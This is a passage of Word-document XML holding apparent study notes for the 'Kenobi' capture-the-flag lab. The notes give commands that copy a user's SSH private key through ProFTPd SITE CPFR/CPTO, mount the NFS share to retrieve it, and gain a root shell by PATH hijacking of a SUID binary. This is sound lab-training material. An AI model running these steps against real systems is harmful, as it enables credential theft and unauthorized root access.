          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Copy Kenobi’s private key using SITE CPFR and SITE CPTO commands</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FC59976" w14:textId="5E41988D" w:rsidR="00483730" w:rsidRPr="0084205E" w:rsidRDefault="00483730" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">In </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> connection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15863131" w14:textId="11363CE0" w:rsidR="00483730" w:rsidRPr="0084205E" w:rsidRDefault="00483730" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Ex. SITE CPFR /home/Kenobi/.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>ssh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>id_rsa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="68CA27ED" w14:textId="4C34164D" w:rsidR="00483730" w:rsidRPr="0084205E" w:rsidRDefault="00483730" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Then SITE CPTO /var/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>id_rsa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="054853E1" w14:textId="42E8D9AE" w:rsidR="00483730" w:rsidRPr="0084205E" w:rsidRDefault="00483730" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>/var/ chosen because it was a mount anonymous can see from previous enumeration above (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>nfs-showmount</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79F3BFF3" w14:textId="6F3B4668" w:rsidR="00483730" w:rsidRPr="0084205E" w:rsidRDefault="00483730" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Mount /var/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> directory to attacker machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5008F67F" w14:textId="7A0778A5" w:rsidR="00483730" w:rsidRPr="0084205E" w:rsidRDefault="00483730" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>“</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00C85EDE" w:rsidRPr="0084205E">
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00C85EDE" w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>mkdir</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>mnt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidR="00C85EDE" w:rsidRPr="0084205E">
        <w:t xml:space="preserve">&lt;custom name, such as </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>kenobiNFS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00C85EDE" w:rsidRPr="0084205E">
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FEB2492" w14:textId="3AB770FB" w:rsidR="00483730" w:rsidRPr="0084205E" w:rsidRDefault="00483730" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="00C85EDE" w:rsidRPr="0084205E">
        <w:t xml:space="preserve">sudo </w:t>
      </w:r>
      <w:r w:rsidRPr="0084205E">
        <w:t>mount &lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>machine_ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>&gt;:/</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>var</w:t>
      </w:r>
      <w:r w:rsidR="00C85EDE" w:rsidRPr="0084205E">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="0084205E">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00C85EDE" w:rsidRPr="0084205E">
        <w:t>mnt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00C85EDE" w:rsidRPr="0084205E">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00C85EDE" w:rsidRPr="0084205E">
        <w:t>kenobiNFS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="01683272" w14:textId="2A762454" w:rsidR="00C85EDE" w:rsidRPr="0084205E" w:rsidRDefault="00C85EDE" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>“ls -la /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>mnt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>kenobiNFS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="115C6783" w14:textId="0812FCD6" w:rsidR="00C85EDE" w:rsidRPr="0084205E" w:rsidRDefault="00C85EDE" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Network mount is now on deployed machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B7A41A2" w14:textId="3B925E2A" w:rsidR="00C85EDE" w:rsidRPr="0084205E" w:rsidRDefault="00C85EDE" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Can now go to /var/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> and get the private key then login to user account</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79335210" w14:textId="3E5EC133" w:rsidR="00C85EDE" w:rsidRPr="0084205E" w:rsidRDefault="00C85EDE" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>“cp /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>mnt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>kenobiNFS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>id_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>rsa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="390936C1" w14:textId="77F021BD" w:rsidR="00C85EDE" w:rsidRPr="0084205E" w:rsidRDefault="00C85EDE" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Sudo </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>chmod</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> 600 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>id_rsa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="524B5927" w14:textId="308AFE8B" w:rsidR="00C85EDE" w:rsidRPr="0084205E" w:rsidRDefault="00C85EDE" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>Ssh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> -I </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>id_rsa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>kenobi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>@&lt;ip&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F53DBAF" w14:textId="542685A3" w:rsidR="00C85EDE" w:rsidRPr="0084205E" w:rsidRDefault="00C85EDE" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Sign in and find flags</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64E19C53" w14:textId="30EC3B13" w:rsidR="00C85EDE" w:rsidRPr="0084205E" w:rsidRDefault="00C85EDE" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Privilege Escalation with </w:t>
      </w:r>
      <w:r w:rsidR="000E2710" w:rsidRPr="0084205E">
        <w:t>Path Variable Manipulation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71A30258" w14:textId="181E0D4F" w:rsidR="000E2710" w:rsidRPr="0084205E" w:rsidRDefault="000E2710" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">SUID Bit – user executes the file with permissions of the </w:t>
      </w:r>
      <w:r w:rsidRPr="0084205E">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">file </w:t>
      </w:r>
      <w:r w:rsidRPr="0084205E">
        <w:t>owner</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53F14619" w14:textId="290B19D4" w:rsidR="000E2710" w:rsidRPr="0084205E" w:rsidRDefault="000E2710" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">SGID Bit – user executes the file with the permissions of the </w:t>
      </w:r>
      <w:r w:rsidRPr="0084205E">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>group</w:t>
      </w:r>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> owner</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29EA9104" w14:textId="255C142C" w:rsidR="000E2710" w:rsidRPr="0084205E" w:rsidRDefault="000E2710" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>File created in directory gets the same group owner</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="587EA50A" w14:textId="463E6FEA" w:rsidR="000E2710" w:rsidRPr="0084205E" w:rsidRDefault="000E2710" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Sticky Bit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="645841F7" w14:textId="1EF2C611" w:rsidR="000E2710" w:rsidRPr="0084205E" w:rsidRDefault="000E2710" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Users are prevented from deleting files from other users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62A53D3C" w14:textId="19D1FB92" w:rsidR="000E2710" w:rsidRPr="0084205E" w:rsidRDefault="000E2710" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>To search a system for those types of files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27ACCA2F" w14:textId="6AF58AB1" w:rsidR="000E2710" w:rsidRPr="0084205E" w:rsidRDefault="000E2710" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Run: find / -perm -u=s -type f 2&gt;/dev/null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68D686DC" w14:textId="027EACDB" w:rsidR="000E2710" w:rsidRPr="0084205E" w:rsidRDefault="000E2710" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>/bin/menu</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50BA000F" w14:textId="10CACD56" w:rsidR="00556175" w:rsidRPr="0084205E" w:rsidRDefault="00556175" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Use “strings” command to check path and determine with or without full path</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F342898" w14:textId="4012C885" w:rsidR="001318FB" w:rsidRPr="0084205E" w:rsidRDefault="001318FB" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Without a full path, can manipulate path to gain root shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BA36CA3" w14:textId="29F0B474" w:rsidR="001318FB" w:rsidRPr="0084205E" w:rsidRDefault="001318FB" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Process</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="124790C6" w14:textId="48918417" w:rsidR="001318FB" w:rsidRPr="0084205E" w:rsidRDefault="001318FB" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>“echo /bin/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>sh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> &gt; curl”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11853FF9" w14:textId="7214D617" w:rsidR="001318FB" w:rsidRPr="0084205E" w:rsidRDefault="001318FB" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:lastRenderedPageBreak/>
        <w:t>“</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>chmod</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> 777 curl”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2466162F" w14:textId="6FE9229F" w:rsidR="001318FB" w:rsidRPr="0084205E" w:rsidRDefault="001318FB" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>“export PATH=/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>:$</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>PATH”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="721FC3EB" w14:textId="5DE21204" w:rsidR="001318FB" w:rsidRPr="0084205E" w:rsidRDefault="001318FB" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>“/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>/bin/menu”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44D9FECA" w14:textId="5AD5FBEC" w:rsidR="001318FB" w:rsidRPr="0084205E" w:rsidRDefault="001318FB" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Confirm new root access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E2E6599" w14:textId="4003BA98" w:rsidR="007C2118" w:rsidRPr="0084205E" w:rsidRDefault="007C2118" w:rsidP="0084205E">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6FAD95CD" w14:textId="4BAA16F7" w:rsidR="00111E1A" w:rsidRPr="0084205E" w:rsidRDefault="00B71D21" w:rsidP="0084205E">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>RustScan</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="573FCFE1" w14:textId="724DBA54" w:rsidR="00B71D21" w:rsidRPr="0084205E" w:rsidRDefault="00B71D21" w:rsidP="0084205E">
      <w:pPr>
